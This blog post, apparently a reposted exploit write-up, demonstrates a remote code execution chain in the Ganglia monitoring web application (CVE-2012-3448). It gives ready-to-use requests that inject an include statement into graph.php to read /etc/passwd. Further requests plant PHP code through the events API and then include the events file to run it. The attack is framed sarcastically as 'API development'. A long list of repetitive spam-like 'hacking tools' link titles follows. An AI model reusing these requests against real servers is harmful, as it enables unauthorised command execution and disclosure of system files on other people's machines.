Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.

As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'

As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448

Related articles

1. Hack Tools
2. Pentest Tools Url Fuzzer
3. Pentest Tools List
4. Hacking Tools Windows 10
5. Underground Hacker Sites
6. Pentest Tools Android
7. Pentest Tools For Android
8. Hacker Tools Linux
9. Hacking Tools For Pc
10. What Are Hacking Tools
11. Nsa Hack Tools
12. Hack Tools For Mac
13. Pentest Tools Framework
14. Pentest Tools Linux
15. Hacker Tool Kit
16. Pentest Tools For Android
17. Hack Apps
18. Beginner Hacker Tools
19. What Are Hacking Tools
20. Blackhat Hacker Tools
21. Beginner Hacker Tools
22. Hack Apps
23. Hacker Tools Linux
24. Hacker Tools For Windows
25. Hack Tools For Ubuntu
26. Computer Hacker
27. Hacker Tools Free
28. New Hacker Tools
29. Pentest Tools Subdomain
30. Hacker Tools For Mac
31. Hak5 Tools
32. Nsa Hack Tools Download
33. Hacker Tools Online
34. Hacking Apps
35. Ethical Hacker Tools
36. Hacking Tools For Windows 7
37. Hacking Tools Windows
38. Pentest Tools Nmap
39. Free Pentest Tools For Windows
40. What Is Hacking Tools
41. Physical Pentest Tools
42. Hack And Tools
43. Best Pentesting Tools 2018
44. Termux Hacking Tools 2019
45. Free Pentest Tools For Windows
46. Black Hat Hacker Tools
47. Bluetooth Hacking Tools Kali
48. Pentest Automation Tools
49. Hacker Hardware Tools
50. Nsa Hacker Tools
51. Hack Tools For Pc
52. Hacking Tools For Pc
53. Hacking Tools Online
54. Hacking Tools Windows
55. Hacker Tools Software
56. Hacking Tools Windows
57. Hacker Tools Linux
58. Pentest Tools For Windows
59. Hacking Tools Software
60. Free Pentest Tools For Windows
61. Hacker Tools 2020
62. Black Hat Hacker Tools
63. Install Pentest Tools Ubuntu
64. Hacker Tools For Mac
65. Hack Website Online Tool
66. Hacker Tools Github
67. Hack Tools Mac
68. Hacker Tools For Ios
69. Pentest Tools Website
70. Best Pentesting Tools 2018
71. Pentest Tools
72. Hacker Tools Apk
73. Pentest Tools For Ubuntu
74. Easy Hack Tools
75. Nsa Hack Tools
76. Pentest Tools Github
77. Pentest Tools For Android
78. Blackhat Hacker Tools
79. Pentest Tools Free
80. Hacker Tools Windows
81. Nsa Hack Tools
82. Hacking Tools For Windows
83. Hack Tools For Windows
84. Hacker Techniques Tools And Incident Handling
85. Tools 4 Hack
86. Best Hacking Tools 2020
87. Hacker Security Tools
88. Hacking Tools For Mac
89. Hack And Tools
90. Pentest Tools For Ubuntu
91. Hack Tools
92. Hack Tools Download
93. Android Hack Tools Github
94. Hacking Tools Kit
95. Pentest Tools Apk
96. Hack Tools For Games
97. Install Pentest Tools Ubuntu
98. Hacker Search Tools
99. Usb Pentest Tools
100. Github Hacking Tools
101. Hacking Tools For Kali Linux
102. Ethical Hacker Tools
103. Hacker Tools 2019
104. Hacker Tool Kit
105. Hacking App
106. Hacking Tools For Mac
107. New Hack Tools
108. Hacker Techniques Tools And Incident Handling
109. Hack Tool Apk No Root
110. Hack And Tools
111. Hack Tools Online
112. Hak5 Tools
113. Tools For Hacker
114. Nsa Hack Tools
115. Beginner Hacker Tools
116. Hacker Tools Github
117. Pentest Tools List
118. Hacking Apps
119. Hack And Tools
120. Hack Apps
121. Hack Tools 2019
122. Hacker Tools Mac
123. Physical Pentest Tools
124. Hacking Tools Windows
125. Hacker Tool Kit
126. Hacking Tools Mac
127. Hack Tools Github
128. Hack Tools Online
129. Hacking Tools Name
130. Easy Hack Tools
131. Hack Tools 2019
132. Install Pentest Tools Ubuntu
133. Pentest Tools Nmap
134. Hacking Tools Name
135. Hack Tools 2019
136. Best Pentesting Tools 2018
137. Hackrf Tools
138. How To Install Pentest Tools In Ubuntu
139. Pentest Reporting Tools
140. Hacking Tools Mac
141. Hacking Tools Usb
142. Hack Apps